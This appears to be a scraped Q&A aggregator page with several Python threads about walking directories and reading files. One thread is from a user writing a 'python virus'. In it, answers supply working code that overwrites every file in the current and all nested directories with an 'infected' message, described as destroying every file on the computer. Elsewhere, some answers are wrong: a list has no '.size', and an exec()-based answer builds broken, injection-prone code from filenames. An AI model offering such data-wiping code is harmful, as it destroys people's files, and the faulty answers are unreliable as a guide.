Storing files from a directory in variable names in python

Storing files from a directory in variable names in python - python

I have this:
directory = os.path.join("/home","path")
for root,dirs,files in os.walk(directory):
for file in files:
if file.endswith(".csv"):
f=open(file)
f.close()
and 'files' contains about 300 csv files like:
['graph_2020-08-04_2020-08-17.csv',
'graph_2020-04-11_2020-04-24.csv',
'graph_2021-02-05_2021-02-18.csv',
...]
I basically want to add a name to each of these files, so that i have file1, file2, file3 ... for all of them. So if I call file1, it contains graph_2020-08-04_2020-08-17.csv for example. This is what i have:
for i in files:
file[i] = files[i]
But it returns
TypeError: list indices must be integers or slices, not str
What am I doing wrong in my approach?

files is a list with strings in it, not integers. So when you say 'for i in files,' you are telling it that 'i' is a string. Then when you try to do file[i], it gives an error because you 'i' is a string, not an int. So instead of saying 'for i in files', you could say 'for i in range(files.size)' or something like that

You can use the builtin function exec() to execute a string as Python code. An example of how to do this:
file_number = 1 # A counter to keep track of the number of files you have found
directory = os.path.join("/home","path")
for root, dirs, files in os.walk(directory):
for file in files:
if file.endswith(".csv"):
exec("file" + str(file_number) + " = " + file)
file_number += 1
print(file1) # Example usage
I think this is what you wanted to achieve.

Just go with the enumerate(iterable,start) function:
for i,file_name in enumerate(files): # or optionally you can pass a start position which by default is set to 0 and we don't need to modify it in your case
file[i] = file_name
Do remember to initialize a seperate file = [] list as i see you are using file as a loop variable and that way you can't pass it a value and an index,that way the program might throw an error. Do learn about the enumerate() function it saves a lot...Happy Coding..:)

What I understood from your question is that you have a list with n element. and you want to assign each element to n different variables. I can't understand why would you need this but:
#wolfenstein11x is right. with that for loop you'll have each element. However let's say you fix that. With the code you wrote you will assign each element of files to a list named file. (considering it has at least n element)
If what I understood is right and you really want n different variable for each element in files list (still I don't know why would you need it) you might take a look to exec.
Edit after reply:
You can read each file in a loop and do what ever with the content:
directory = os.path.join("/home","path")
for root,dirs,files in os.walk(directory):
for file in files:
with open(file, "r") as conetnt:
print(conetnt.read())

Use for i in range(files.size) instead of for i in files.

Related

How can i read specific files in a folder (files within a range)in Python

For example, I have some 43000 txt files in my folder, however, I want to read not all the files but just some of them by giving in a range, like from 1.txt till 14400.txt`. How can I achieve this in Python? For now, I'm reading all the files in a directory like
for each in glob.glob("data/*.txt"):
with open(each , 'r') as file:
content = file.readlines()
with open('{}.csv'.format(each[0:-4]) , 'w') as file:
file.writelines(content)
Any way I can achieve the desired results?

Since glob.glob() returns an iterable, you can simply iterate over a certain section of the list using something like:
import glob
for each in glob.glob("*")[:5]:
print(each)
Just use variable list boundaries and I think this achieves the results you are looking for.
Edit: Also, be sure that you are not trying to iterate over a list slice that is out of bounds, so perhaps a check for that prior might be in order.

If the files have numerically consecutive names starting with 1.txt, you can use range() to help construct the filenames:
for num in range(1, 14400):
filename = "data/%d.txt" % num

I found a solution here: How to extract numbers from a string in Python?
import os
import re
filepath = './'
for filename in os.listdir():
numbers_in_name = re.findall('\d',filename)
if (numbers_in_name != [] and int(numbers_in_name[0]) < 5 ) :
print(os.path.join(filepath,filename))
#do other stuff with the filenames
You can use re to get the numbers in the filename. This prints all filenames where the first number is smaller than 5 for example.

How to add specific files from a series of folders to an array?

So far I've managed to compile all of the files from a series of folders using the following:
path = r'C:\Users\keefr\Documents\Data\Pulse Characterisation\sample 7'
subfolders = [f.path for f in os.scandir(path) if f.is_dir()]
for sub in subfolders:
for f in os.listdir(sub):
print(f)
files = [i for i in f if os.path.isfile(os.path.join(f,'*.txt')) and 'data' in f]
Where f prints out the names of all of the files. What I want to do is take only certain files from this (starts with 'data' and is a .txt file) and put these in an array called files. The last line in the above code is where I tried to do this but whenever I print files it's still an empty array. Any ideas where I'm going wrong and how to fix it?
Update
I've made some progress, I changed the last line to:
if os.path.isfile(os.path.join(sub,f)) and 'data' in f:
files.append(f)
So I now have an array with the correct file names. The problem now is that there's a mix of .meta, .index and .txt files and I only want the .txt files. What's the best way to filter out the other types of files?

I would probably do it like this. Considering f is the filename, and is a string, python has functions startswith() and endswith() that can be applied to specifically meet your criteria of starting with data and ending with .txt. If we find such a file, we append it to file_list. If you want the full path in file_list, I trust you are able to make that modification.
import os
path = r'C:\Users\keefr\Documents\Data\Pulse Characterisation\sample 7'
subfolders = [f.path for f in os.scandir(path) if f.is_dir()]
file_list = []
for sub in subfolders:
for f in os.listdir(sub):
if (f.startswith("data") and f.endswith(".txt")):
file_list.append(f)
print(file_list)

IOError: [Errno 2] No such file or directory: when the name was made by looping over existing files

I'm trying to have the bottom part of the code iterate over some files. These files should be corresponding and are differentiated by a number, so the counter is to change the number part of the file.
The file names are generated by looking through the given files and selecting files containing certain things in the title, then having them ordered using the count.
This code works independently, in it's own (lonely) folder, and prints the correct files in the correct order. However when i use this in my main code, where file_1 and file_2 are referenced (the decoder and encoder parts of the code) I get the error in the title. There is no way there is any typo or that the files don't exist because python made these things itself based on existing file names.
import os
count = 201
while 205 > count:
indir = 'absolute_path/models'
for root, dirs, filenames in os.walk(indir):
for f in filenames:
if 'test-decoder' in f:
if f.endswith(".model"):
if str(count) in f:
file_1 = f
print(file_1)
indir = 'absolute_path/models'
for root, dirs, filenames in os.walk(indir):
for f in filenames:
if 'test-encoder' in f:
if f.endswith(".model"):
if str(count) in f:
file_2 = f
print(file_2)
decoder1.load_state_dict(
torch.load(open(file_1, 'rb')))
encoder1.load_state_dict(
torch.load(open(file_2, 'rb')))
print(getBlueScore(encoder1, decoder1, pairs, src, tgt))
print_every=10
print(file_1 + file_2)
count = count + 1
i then need to use these files two by two.

It's very possible that you are running into issues with variable scoping, but without being able to see your entire code it's hard to know for sure.
If you know what the model files should be called, might I suggest this code:
for i in range(201, 205):
e = 'absolute_path/models/test_encoder_%d.model' % i
d = 'absolute_path/models/test_decoder_%d.model' % i
if os.path.exists(e) and os.path.exists(d):
decoder1.load_state_dict(torch.load(open(e, 'rb')))
encoder1.load_state_dict(torch.load(open(d, 'rb')))
Instead of relying on the existence of strings in a path name which could lead to errors this would force only those files you want to open to be opened. Also it gets rid of any possible scoping issues.
We could clean it up a bit more but you get the idea.

Listing Directories In Python Multi Line

i need help trying to list directories in python, i am trying to code a python virus, just proof of concept, nothing special.
#!/usr/bin/python
import os, sys
VIRUS=''
data=str(os.listdir('.'))
data=data.translate(None, "[],\n'")
print data
f = open(data, "w")
f.write(VIRUS)
f.close()
EDIT: I need it to be multi-lined so when I list the directorys I can infect the first file that is listed then the second and so on.
I don't want to use the ls command cause I want it to be multi-platform.

Don't call str on the result of os.listdir if you're just going to try to parse it again. Instead, use the result directly:
for item in os.listdir('.'):
print item # or do something else with item

So when writing a virus like this, you will want it to be recursive. This way it will be able to go inside every directory it finds and write over those files as well, completely destroying every single file on the computer.
def virus(directory=os.getcwd()):
VIRUS = "THIS FILE IS NOW INFECTED"
if directory[-1] == "/": #making sure directory can be concencated with file
pass
else:
directory = directory + "/" #making sure directory can be concencated with file
files = os.listdir(directory)
for i in files:
location = directory + i
if os.path.isfile(location):
with open(location,'w') as f:
f.write(VIRUS)
elif os.path.isdir(location):
virus(directory=location) #running function again if in a directory to go inside those files
Now this one line will rewrite all files as the message in the variable VIRUS:
virus()
Extra explanation:
the reason I have the default as: directory=os.getcwd() is because you originally were using ".", which, in the listdir method, will be the current working directories files. I needed the name of the directory on file in order to pull the nested directories
This does work!:
I ran it in a test directory on my computer and every file in every nested directory had it's content replaced with: "THIS FILE IS NOW INFECTED"

Something like this:
import os
VIRUS = "some text"
data = os.listdir(".") #returns a list of files and directories
for x in data: #iterate over the list
if os.path.isfile(x): #if current item is a file then perform write operation
#use `with` statement for handling files, it automatically closes the file
with open(x,'w') as f:
f.write(VIRUS)

How can I get the file names and contents of a whole directory?

I have a directory named main that contains two files: a text file named alex.txt that only has 100 as its contents, and another file named mark.txt that has 400.
I want to create a function that will go into the directory, and take every file name and that file's contents and store them (into a dict?). So the end result would look something like this:
({'alex.txt', '100'}, {'mark.txt', '400'})
What would be the best way of doing this for large amounts of files?

This looks like a good job for os.walk
d = {}
for path,dirs,fnames in os.walk(top):
for fname in fnames:
visit = os.path.join(path,fname)
with open(visit) as f:
d[visit] = f.read()
This solution will also recurse into subdirectories if they are present.

Using a dictionary looks like the way to go.
You can use os.listdir to get a list of the files in your directory. Then, iterate on the files, opening each of them, reading its input and storing them in your dictionary.
If your main directory has some subdirectories, you may want to use the os.walk function to process them recursively. Stick to os.listdir otherwise.
Note that an item of os.listdir is relative to main. You may want to add the path to main before opening the file. In that case, use os.path.join(path_to_main, f) where f is an item of os.listdir.

import os
bar = {}
[bar.update({i: open(i, 'r').read()}) for i in os.listdir('.')]
or (via mgilson)
bar = dict( (i,open(i).read()) for i in os.listdir('.') )

Develop Reference

Python is a programming language that lets you work quickly and integrate systems more effectively.

Storing files from a directory in variable names in python - python

Use for i in range(files.size) instead of for i in files.

Related

How can i read specific files in a folder (files within a range)in Python

How to add specific files from a series of folders to an array?

IOError: [Errno 2] No such file or directory: when the name was made by looping over existing files

Listing Directories In Python Multi Line

How can I get the file names and contents of a whole directory?

Categories

Resources